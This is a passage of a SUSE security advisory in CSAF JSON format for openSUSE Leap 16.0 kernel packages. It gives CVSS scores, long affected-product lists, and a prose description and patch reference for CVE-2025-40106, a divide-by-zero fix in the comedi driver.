"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
